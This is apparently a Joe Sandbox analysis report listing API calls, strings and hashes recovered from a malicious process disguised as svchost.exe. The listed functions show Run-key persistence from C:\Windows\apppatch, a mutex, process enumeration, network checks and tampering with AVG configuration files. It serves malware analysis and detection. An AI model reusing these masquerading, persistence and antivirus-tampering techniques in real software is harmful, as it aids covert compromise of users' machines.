InternetCloseHandle.WININET(00000000), ref: 02D14AD7

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$CloseHandleInternet$FreeValidate
String ID:
API String ID: 278890334-0
Opcode ID: 71122670706fc7a271578eb42694fa5f67c0de0ebeef80bf74266c7191a766b4
Instruction ID: 06651dd91709504d9d4885cb291cbb251eb0dd82fafd386593d63ddd4d61c5cc
Opcode Fuzzy Hash: 71122670706fc7a271578eb42694fa5f67c0de0ebeef80bf74266c7191a766b4
Instruction Fuzzy Hash: 8821A131A49154BBDB249BB5BC88F9F7BADEF45318F050459F949D7680CA30DC50DBA0

Function 02D06750 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D06772
memset.MSVCRT ref: 02D06790
lstrcpynA.KERNEL32(?,00000000,00000104,?,?,?,?,?,75920F10), ref: 02D067A9
RegOpenKeyExA.KERNEL32(?,software\microsoft,00000000,00000102,?,?,?,?,?,?,75920F10), ref: 02D0681D
RegSetValueExA.ADVAPI32(?,A3B7FE06a,00000000,00000001,?,00000104,?,?,?,?,?,75920F10), ref: 02D06843
RegDeleteValueA.KERNEL32(?,A3B7FE06a,?,?,?,?,?,75920F10), ref: 02D06854
RegCloseKey.ADVAPI32(?,?,?,?,?,75920F10), ref: 02D06863

Strings

A3B7FE06a, xrefs: 02D0683D, 02D0684E
software\microsoft, xrefs: 02D06817

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Valuememset$CloseDeleteOpenlstrcpyn
String ID: A3B7FE06a$software\microsoft
API String ID: 2098141307-1900811875
Opcode ID: 8ee37432352226aa4cb48ebefcca60564a0e4337ae132d23a324b0fe26ff65ea
Instruction ID: ed91800d0763daf1d029f8b88362dfd4d796fc52f173a3d03e23d9303093f2a7
Opcode Fuzzy Hash: 8ee37432352226aa4cb48ebefcca60564a0e4337ae132d23a324b0fe26ff65ea
Instruction Fuzzy Hash: 6531F7B5940208ABEB14DF64DCC9FEE77ACEB18304F5045ADF546D3291D6B0DE988BA0

Function 02D132C0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76registryCOMMON

Download Yara Rule

APIs

IsUserAnAdmin.SHELL32 ref: 02D132C8
RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,02D168E7), ref: 02D132FF
RegQueryValueExA.ADVAPI32(?,A3B7FA4Aa,00000000,02D168E7,00000000,?,?,02D168E7), ref: 02D1331C
RegCloseKey.ADVAPI32(?,?,02D168E7), ref: 02D13326
RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?,?,02D168E7), ref: 02D13359
RegQueryValueExA.KERNEL32(?,A3B7FA4Aa,00000000,?,00000000,02D168E7,?,02D168E7), ref: 02D13376
RegCloseKey.ADVAPI32(?,?,02D168E7), ref: 02D13380

Strings

software\microsoft, xrefs: 02D132E8, 02D13342
A3B7FA4Aa, xrefs: 02D13316, 02D13370

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue$AdminUser
String ID: A3B7FA4Aa$software\microsoft
API String ID: 2113243795-1822152813
Opcode ID: 64e3faddea0b77e90a19e991d4baa881cbfb310cc0a3b16cdd104774edb885f5
Instruction ID: ec032f3f1fae0698fdf0e8bd089ae29427f26c8f1317c3c99648f9051f564c43
Opcode Fuzzy Hash: 64e3faddea0b77e90a19e991d4baa881cbfb310cc0a3b16cdd104774edb885f5
Instruction Fuzzy Hash: 7C211279E40219FBEB10CFA4EC45FAEB7B8EF58704F504599F501A6240EBB46A448B94

Function 02D255C0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 118COMMON

Download Yara Rule

APIs

GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02D255EF
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00FFAAFF,00000000,00000000,00000000,00000000), ref: 02D25628
_snprintf.MSVCRT ref: 02D25693
_snprintf.MSVCRT ref: 02D256F6

Strings

A3B7FA9Ea, xrefs: 02D25661, 02D25692
5C590534, xrefs: 02D256C3, 02D256F5
1234567890QWERTYUIOPASDFGHJKLZXCVBNM, xrefs: 02D255D1

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: _snprintf$DirectoryInformationSystemVolumeWindows
String ID: 1234567890QWERTYUIOPASDFGHJKLZXCVBNM$5C590534$A3B7FA9Ea
API String ID: 2823094833-952618284
Opcode ID: 2ab011cf9a54cf91d922e41eb8d0a86cad4fd5764b10d8c76ad29fbfbdb131fa
Instruction ID: 0c03c333fb3fc5adbde736b451b6254f60f95f2cdc0a8fa88414bb9ca41267af
Opcode Fuzzy Hash: 2ab011cf9a54cf91d922e41eb8d0a86cad4fd5764b10d8c76ad29fbfbdb131fa
Instruction Fuzzy Hash: B4413C71A40265EBDB14CF68AD84FEEF7E6EFA4304F9541A1D9449B380D6B05E09C790

Function 02D03548 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 53registryCOMMON

Download Yara Rule

APIs

PathFileExistsA.SHLWAPI(C:\Windows\apppatch\svchost.exe,C:\Windows\apppatch\svchost.exe,C:\Windows\apppatch\svchost.exe), ref: 02D035AD
RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,00000000), ref: 02D035CC
RegQueryValueExA.ADVAPI32(00000000,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 02D035E6
RegCloseKey.KERNEL32(00000000), ref: 02D035F5

Strings

software\microsoft\windows\currentversion\run, xrefs: 02D035C2
C:\Windows\apppatch\svchost.exe, xrefs: 02D0358E, 02D03593, 02D035A8, 02D035D5
userinit, xrefs: 02D035E0

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: CloseExistsFileOpenPathQueryValue
String ID: C:\Windows\apppatch\svchost.exe$software\microsoft\windows\currentversion\run$userinit
API String ID: 3861587275-2273877672
Opcode ID: fa8690275e358ebebecec2d2ee83cfb4af836d4be1c838daa3fa985208be8396
Instruction ID: a9d323122a1529c7aae54af86f8e2460c7b353fd92cdac153e17ff4ea3873809
Opcode Fuzzy Hash: fa8690275e358ebebecec2d2ee83cfb4af836d4be1c838daa3fa985208be8396
Instruction Fuzzy Hash: D3012F34B4024CEBFB14CA60BD8AFED3355DB54B04F5005A4E545626A0E6B09D448BA0

Function 02D03564 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47registryCOMMON

Download Yara Rule

APIs

PathFileExistsA.SHLWAPI(C:\Windows\apppatch\svchost.exe,C:\Windows\apppatch\svchost.exe,C:\Windows\apppatch\svchost.exe), ref: 02D035AD
RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,00000000), ref: 02D035CC
RegQueryValueExA.ADVAPI32(00000000,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 02D035E6
RegCloseKey.KERNEL32(00000000), ref: 02D035F5

Strings

software\microsoft\windows\currentversion\run, xrefs: 02D035C2
C:\Windows\apppatch\svchost.exe, xrefs: 02D0358E, 02D03593, 02D035A8, 02D035D5
userinit, xrefs: 02D035E0

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: CloseExistsFileOpenPathQueryValue
String ID: C:\Windows\apppatch\svchost.exe$software\microsoft\windows\currentversion\run$userinit
API String ID: 3861587275-2273877672
Opcode ID: 58f28d39fe83e87438c003de9ea130d5dc4600da392bf70bd89e1f8716af08e6
Instruction ID: 8daff3939de7d7c0af8bd1f54018fd434911da0a4c4a725559e84861072a9a3e
Opcode Fuzzy Hash: 58f28d39fe83e87438c003de9ea130d5dc4600da392bf70bd89e1f8716af08e6
Instruction Fuzzy Hash: 2401DD34B4024CEBFB14CB60FC99FED7364DB54B14F5004A4F946A22A0E6B09D448BA0

Function 02D07140 Relevance: 12.1, APIs: 8, Instructions: 88fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,7591F380,?,?,?,02D14A6C,00000000,00000000,00000000), ref: 02D07179
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,02D14A6C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02D0718E
LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,02D14A6C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02D0719D
WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,02D14A6C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02D071AF
UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,02D14A6C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02D071BF
SetEndOfFile.KERNEL32(00000000,?,?,02D14A6C,00000000), ref: 02D071CC
GetHandleInformation.KERNEL32(00000000,00000000,?,?,02D14A6C,00000000), ref: 02D071EE
CloseHandle.KERNEL32(00000000,?,?,02D14A6C,00000000), ref: 02D071FF

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: File$Handle$CloseCreateInformationLockPointerUnlockWrite
String ID:
API String ID: 1080409958-0
Opcode ID: 516bba3e2214349a54c61e9bda6e18674fece45ad39e98836ef15e0e782ab13b
Instruction ID: 1fe6e2718e308242bb6c5c2a414151a477a866d430d10c63754e418e358096b0
Opcode Fuzzy Hash: 516bba3e2214349a54c61e9bda6e18674fece45ad39e98836ef15e0e782ab13b
Instruction Fuzzy Hash: 4721B235A412047BE7214E26DC88FAFBBACEB89754F60C515FD049A3C0D3709D51CAB0

Function 02D06BC0 Relevance: 10.6, APIs: 7, Instructions: 101sleepthreadCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D06BE1

Part of subcall function 02D14AF0: IsNetworkAlive.SENSAPI(02D06BEE,00000000), ref: 02D14B03
Part of subcall function 02D14AF0: IsUserAnAdmin.SHELL32 ref: 02D14B11
Part of subcall function 02D14AF0: DnsFlushResolverCache.DNSAPI ref: 02D14B1B
Part of subcall function 02D14AF0: memset.MSVCRT ref: 02D14B38
Part of subcall function 02D14AF0: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,75920F10), ref: 02D14B57
Part of subcall function 02D14AF0: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02D14B70
Part of subcall function 02D14AF0: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02D14B83
Part of subcall function 02D14AF0: memset.MSVCRT ref: 02D14B9C
Part of subcall function 02D14AF0: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,75920F10), ref: 02D14BB5
Part of subcall function 02D14AF0: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02D14BC8
Part of subcall function 02D14AF0: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02D14BD5

Sleep.KERNEL32(000001F4,76EDC3F0,00000000,75920F10), ref: 02D06BFD
IsUserAnAdmin.SHELL32 ref: 02D06C25
CreateThread.KERNEL32(00000000,00000000,02D06870,00000000,00000000,00000000), ref: 02D06C6E
WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF,-80000001), ref: 02D06C9A
GetHandleInformation.KERNEL32(?,00000000), ref: 02D06CC7
CloseHandle.KERNEL32(?), ref: 02D06CD8

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: memset$AdminCheckConnectionHandleInternetUserlstrcpyn$AliveCacheCloseCreateFlushInformationMultipleNetworkObjectsResolverSleepThreadWait
String ID:
API String ID: 202280876-0
Opcode ID: b030c4ba037b334c7ddae3f9d39a66bb7120aedb4a26606fb40761b2a7ed8522
Instruction ID: 27b8929d04b3cb4164166f01fc98f48045c48e432e7390d73ffa2ac9cce54a6a
Opcode Fuzzy Hash: b030c4ba037b334c7ddae3f9d39a66bb7120aedb4a26606fb40761b2a7ed8522
Instruction Fuzzy Hash: 48313BB1D802146BEB219F61ACC4BAE7BADDB44704F100564EE05963E0DBB0CDB1CBE9

Function 00402340 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74filetimeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(\\.\pipe\acsipc_server,C0000000,00000003,?,00000003,80000080,00000000,00000000), ref: 004023D6
WriteFile.KERNEL32(00000000,D48A445E,00000028,?,00000000), ref: 004023F6
GetSystemTimeAsFileTime.KERNEL32(?), ref: 004023FC
WriteFile.KERNEL32(00000000,B5CB6C63,0000001C,?,00000000), ref: 0040241A
CloseHandle.KERNEL32(00000000), ref: 0040241D

Strings

\\.\pipe\acsipc_server, xrefs: 00402365

Memory Dump Source

Source File: 00000002.00000002.3269898642.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269898642.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: File$TimeWrite$CloseCreateHandleSystem
String ID: \\.\pipe\acsipc_server
API String ID: 3225117150-898603304
Opcode ID: 94b1d67b28c7260292b1a7477ac8e46b5ec02ea568fbb3c68bcd621bbab052b5
Instruction ID: 3dcb9c770a9bbc908c19996743ce3c51c52a4f68684fd20990d5167f2ff57074
Opcode Fuzzy Hash: 94b1d67b28c7260292b1a7477ac8e46b5ec02ea568fbb3c68bcd621bbab052b5
Instruction Fuzzy Hash: 9B31E0B1C0121CABDB10DFD9D985AEEFBB8FB48314F10422AE614BB280D7B41A458F95

Function 00401AA0 Relevance: 10.6, APIs: 7, Instructions: 72processCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00401AC4
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00401ACF
Process32First.KERNEL32 ref: 00401AF5
StrStrIA.SHLWAPI(?,004010DF), ref: 00401B10
Process32Next.KERNEL32(00000000,?), ref: 00401B1C
GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401B38
FindCloseChangeNotification.KERNEL32(00000000), ref: 00401B4A

Memory Dump Source

Source File: 00000002.00000002.3269898642.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269898642.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: Process32$ChangeCloseCreateFindFirstHandleInformationNextNotificationSnapshotToolhelp32memset
String ID:
API String ID: 3068433855-0
Opcode ID: f5034955aae474984994a817a0ed0942b8356643e55c240cad4dcfde9e81f7f8
Instruction ID: dd63a524005d9bd3fdf31d3318007fe9a0ed814c8c3d3d806708decfbcb8f66e
Opcode Fuzzy Hash: f5034955aae474984994a817a0ed0942b8356643e55c240cad4dcfde9e81f7f8
Instruction Fuzzy Hash: 9611EBB25043105BC310EF55DC48A9BBBACEBD5360F00453AFE55A3290E734E949CBEA

Function 02D24800 Relevance: 10.6, APIs: 7, Instructions: 72processCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D24824
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D2482F
Process32First.KERNEL32 ref: 02D24855
StrStrIA.SHLWAPI(?,02D017FF), ref: 02D24870
Process32Next.KERNEL32(00000000,?), ref: 02D2487C
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D24898
CloseHandle.KERNEL32(00000000), ref: 02D248AA

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
String ID:
API String ID: 3955875343-0
Opcode ID: f2896378dfe3f0476ac91ff06f2041fee684f67a6b751d3b7d5a258b349bffc4
Instruction ID: ae439c0e612a270a71d5ced6a1e6953a21194e4056bf849a63009a8ec20564e0
Opcode Fuzzy Hash: f2896378dfe3f0476ac91ff06f2041fee684f67a6b751d3b7d5a258b349bffc4
Instruction Fuzzy Hash: EB11D5769043A06FD310DE65E848A9BFBE8EBA5764F404919FD54C3380E7309D18CBE2

Function 02D17B30 Relevance: 7.6, APIs: 5, Instructions: 68sleepsynchronizationCOMMON

Download Yara Rule

APIs

PathFindFileNameA.SHLWAPI(?), ref: 02D17B7A
FindFirstChangeNotificationA.KERNEL32(?,00000000,0000010D,?,?,00000000), ref: 02D17BB8
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000), ref: 02D17BD3
FindNextChangeNotification.KERNEL32(00000000,?,?,00000000), ref: 02D17BDA
Sleep.KERNEL32(00000BB8,?,?,00000000), ref: 02D17C01

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Find$ChangeNotification$FileFirstNameNextObjectPathSingleSleepWait
String ID:
API String ID: 433761119-0
Opcode ID: c0e9d849f5351167a8a217dad4d9e548118fe2583ea77806f1efd5db4efa9fd2
Instruction ID: 111c3c97088928070be83b6816416847d64ef26ee3a977c5daff0491a8d75826
Opcode Fuzzy Hash: c0e9d849f5351167a8a217dad4d9e548118fe2583ea77806f1efd5db4efa9fd2
Instruction Fuzzy Hash: A621C334900219E7F7219BA9BD54BEAB7B8AB15700F2406A1A84197790E7B0DE84CBA0

Function 02D17B56 Relevance: 7.6, APIs: 5, Instructions: 54sleepsynchronizationCOMMON

Download Yara Rule

APIs

PathFindFileNameA.SHLWAPI(?), ref: 02D17B7A
FindFirstChangeNotificationA.KERNEL32(?,00000000,0000010D,?,?,00000000), ref: 02D17BB8
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000), ref: 02D17BD3
FindNextChangeNotification.KERNEL32(00000000,?,?,00000000), ref: 02D17BDA
Sleep.KERNEL32(00000BB8,?,?,00000000), ref: 02D17C01

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Find$ChangeNotification$FileFirstNameNextObjectPathSingleSleepWait
String ID:
API String ID: 433761119-0
Opcode ID: dfd83478570f05e5f9f83252383df9d4b2d934731150c2706f1c5a1e937db4a8
Instruction ID: 4a072e6505a67a683a2a2c6d7458024183612868d5580d632879e92cbe3603eb
Opcode Fuzzy Hash: dfd83478570f05e5f9f83252383df9d4b2d934731150c2706f1c5a1e937db4a8
Instruction Fuzzy Hash: FD119438940219EBEB21CBA9ED44BDDB7B8AF14704F244594E941977D0DBB0DE84CFA0

Function 02D06870 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

IsUserAnAdmin.SHELL32 ref: 02D068A0

Part of subcall function 02D06750: memset.MSVCRT ref: 02D06772
Part of subcall function 02D06750: memset.MSVCRT ref: 02D06790
Part of subcall function 02D06750: lstrcpynA.KERNEL32(?,00000000,00000104,?,?,?,?,?,75920F10), ref: 02D067A9
Part of subcall function 02D06750: RegOpenKeyExA.KERNEL32(?,software\microsoft,00000000,00000102,?,?,?,?,?,?,75920F10), ref: 02D0681D
Part of subcall function 02D06750: RegSetValueExA.ADVAPI32(?,A3B7FE06a,00000000,00000001,?,00000104,?,?,?,?,?,75920F10), ref: 02D06843
Part of subcall function 02D06750: RegCloseKey.ADVAPI32(?,?,?,?,?,75920F10), ref: 02D06863

GetProcessHeap.KERNEL32(00000000,?), ref: 02D068C7
HeapValidate.KERNEL32(00000000), ref: 02D068CA
GetProcessHeap.KERNEL32(00000000,?), ref: 02D068D7
HeapFree.KERNEL32(00000000), ref: 02D068DA

Part of subcall function 02D063B0: memset.MSVCRT ref: 02D063D8
Part of subcall function 02D063B0: DnsFlushResolverCache.DNSAPI ref: 02D063FC
Part of subcall function 02D063B0: gethostbyname.WS2_32(02D06C17), ref: 02D06406
Part of subcall function 02D063B0: GetTempPathA.KERNEL32(00000104,?), ref: 02D06420
Part of subcall function 02D063B0: GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 02D06438
Part of subcall function 02D063B0: calloc.MSVCRT ref: 02D064D6
Part of subcall function 02D063B0: exit.MSVCRT ref: 02D064E5

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$memset$ProcessTemp$AdminCacheCloseFileFlushFreeNameOpenPathResolverUserValidateValuecallocexitgethostbynamelstrcpyn
String ID:
API String ID: 1054002843-0
Opcode ID: a57fd5403b795de404bf1a6a12eba6b4d1b044319eb523b4fc237438cf429cfd
Instruction ID: bbae1576d59423f0c5643996de2f109de75c670d76a88634f1fa790630951f9e
Opcode Fuzzy Hash: a57fd5403b795de404bf1a6a12eba6b4d1b044319eb523b4fc237438cf429cfd
Instruction Fuzzy Hash: 6AF0A476981224ABDA202AA1F849FDB379DDB91762F000526F604D63D0D7F5EC70CAF4

Function 00402430 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64fileCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402448
MoveFileA.KERNEL32(?,?), ref: 0040250F

Strings

\AVG\AVG9\dfmcfg.dat, xrefs: 004024CC
\AVG\AVG9\dfncfg.dat, xrefs: 00402488

Memory Dump Source

Source File: 00000002.00000002.3269898642.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269898642.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: FileFolderMovePath
String ID: \AVG\AVG9\dfmcfg.dat$\AVG\AVG9\dfncfg.dat
API String ID: 1404575960-1083204512
Opcode ID: e53c7f5395ff5d23e1ea87fbe032685214c058210a3022917d0998b022fdd273
Instruction ID: 2817f7f5a2ee45723a7bffe92fbd27ee54b29152b6db55fc9663a9b726faa6ae
Opcode Fuzzy Hash: e53c7f5395ff5d23e1ea87fbe032685214c058210a3022917d0998b022fdd273
Instruction Fuzzy Hash: 172151B45042448FC719CF14EA98B92BBF1BB88300F1581F9DA99A73B2D6B0D944CF98

Function 02D03750 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49synchronizationCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D0377E
CreateMutexA.KERNEL32(00000000,00000000,?,75920A60,755CDB30), ref: 02D037C5

Strings

A3B7F9B4a, xrefs: 02D03783
Global\, xrefs: 02D03759

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: CreateMutexmemset
String ID: A3B7F9B4a$Global\
API String ID: 3892072029-3156111590
Opcode ID: 0d4a3c24720f22d24f696ba34f567943ba7962cac53271fb13245bef7e5737a0
Instruction ID: c4fc671375d1e58180d29cd6d47ca740af4ef255118f634a1b77e51978c9cd0c
Opcode Fuzzy Hash: 0d4a3c24720f22d24f696ba34f567943ba7962cac53271fb13245bef7e5737a0
Instruction Fuzzy Hash: 70017BB1E401195BDB20C928AC55BFA77E4EB91300F4042A5E989DB380EAB15D45CB80

Function 02D24550 Relevance: 6.1, APIs: 4, Instructions: 55timeCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,76EBFFB0,?,?,?,?,?,02D173C7,00000000,?,00000000), ref: 02D2457D
GetProcessTimes.KERNEL32(00000000,?,?,?,02D173C7,?,?,?,?,?,02D173C7,00000000,?,00000000), ref: 02D2459A
GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,02D173C7,00000000,?,00000000), ref: 02D245B2
CloseHandle.KERNEL32(00000000,?,?,?,?,?,02D173C7,00000000), ref: 02D245C3

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: HandleProcess$CloseInformationOpenTimes
String ID:
API String ID: 3228293703-0
Opcode ID: 6c85aede86f78a555722f4970f9f9fd17d9a0c94582f44a87dd6f765925a75eb
Instruction ID: 15740bb6ff7dd1e2bbde6d074fc7f25461bc03f30d0232806c593b5230e30769
Opcode Fuzzy Hash: 6c85aede86f78a555722f4970f9f9fd17d9a0c94582f44a87dd6f765925a75eb
Instruction Fuzzy Hash: 2D1103B5D00219ABCB00CF96D9849EFFBFCEFA8354F54815AF905A7240D7715A45CBA0

